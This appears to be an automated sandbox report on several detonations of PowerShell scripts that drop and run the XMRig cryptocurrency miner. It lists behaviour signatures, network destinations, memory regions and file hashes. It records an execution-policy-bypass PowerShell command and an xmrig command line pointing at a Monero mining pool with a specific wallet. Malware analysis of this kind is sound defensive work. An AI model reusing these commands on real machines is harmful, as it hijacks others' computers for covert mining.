| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4180 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4180 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
Files
memory/4180-4-0x00007FF921E13000-0x00007FF921E14000-memory.dmp
memory/4180-5-0x0000021D44F30000-0x0000021D44F52000-memory.dmp
memory/4180-7-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4180-10-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4180-11-0x0000021D5DFF0000-0x0000021D5E066000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ugftiv1w.0ta.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4180-27-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4180-51-0x0000021D44FF0000-0x0000021D45002000-memory.dmp
memory/4180-64-0x0000021D44FD0000-0x0000021D44FDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4136-93-0x0000014AC2890000-0x0000014AC28B0000-memory.dmp
memory/4136-94-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-95-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4180-96-0x00007FF921E13000-0x00007FF921E14000-memory.dmp
memory/4180-97-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4180-98-0x00007FF921E10000-0x00007FF9227FC000-memory.dmp
memory/4136-99-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-100-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-101-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-102-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-103-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-104-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-105-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-106-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-107-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-108-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-109-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-110-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-111-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-112-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-113-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-114-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-115-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-116-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-117-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-118-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-119-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-120-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-121-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-122-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-123-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-124-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-125-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-126-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-127-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-128-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-129-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-130-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-131-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-132-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-133-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-134-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-135-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-136-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-137-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-138-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-139-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-140-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-141-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-142-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-143-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-144-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-145-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-146-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-147-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-148-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-149-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-150-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-151-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-152-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-153-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-154-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-155-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-156-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-157-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-158-0x00007FF667620000-0x00007FF668253000-memory.dmp
memory/4136-159-0x00007FF667620000-0x00007FF668253000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:51
Platform
win10v2004-20240508-en
Max time kernel
1741s
Max time network
1750s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.229.43:443 | tcp |
Files
memory/1332-0-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdjxuohe.awq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1332-10-0x00000164DB160000-0x00000164DB182000-memory.dmp
memory/1332-11-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/1332-12-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/1332-13-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/1332-14-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/1332-15-0x00007FF980EF3000-0x00007FF980EF5000-memory.dmp
memory/1332-16-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
memory/1332-17-0x00007FF980EF0000-0x00007FF9819B1000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3888 wrote to memory of 3644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3888 wrote to memory of 3644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/3888-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_naa4ngm4.1hx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3888-9-0x00000203990F0000-0x0000020399112000-memory.dmp
memory/3888-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/3888-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/3888-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/3888-14-0x00000203B1BD0000-0x00000203B1BE2000-memory.dmp
memory/3888-15-0x00000203B1750000-0x00000203B175A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3644-46-0x000001E460370000-0x000001E460390000-memory.dmp
memory/3644-47-0x000001E4603D0000-0x000001E4603F0000-memory.dmp
memory/3644-48-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3888-49-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/3644-50-0x000001E4603F0000-0x000001E460410000-memory.dmp
memory/3644-51-0x000001E460410000-0x000001E460430000-memory.dmp
memory/3888-53-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp
memory/3644-52-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-54-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-57-0x000001E460410000-0x000001E460430000-memory.dmp
memory/3644-56-0x000001E4603F0000-0x000001E460410000-memory.dmp
memory/3644-55-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-58-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-59-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-60-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-61-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-62-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-63-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-64-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-65-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-66-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-67-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-68-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-69-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-70-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-71-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-72-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-73-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-74-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-75-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-76-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-77-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-78-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-79-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-80-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-81-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-82-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-83-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-84-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-85-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-86-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-87-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-88-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-89-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-90-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-91-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-92-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-93-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-94-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-95-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-96-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-97-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-98-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-99-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-100-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-101-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-102-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-103-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-104-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-105-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-106-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-107-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-108-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-109-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-110-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-111-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-112-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-113-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-114-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-115-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
memory/3644-116-0x00007FF7665B0000-0x00007FF7671E3000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:55
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
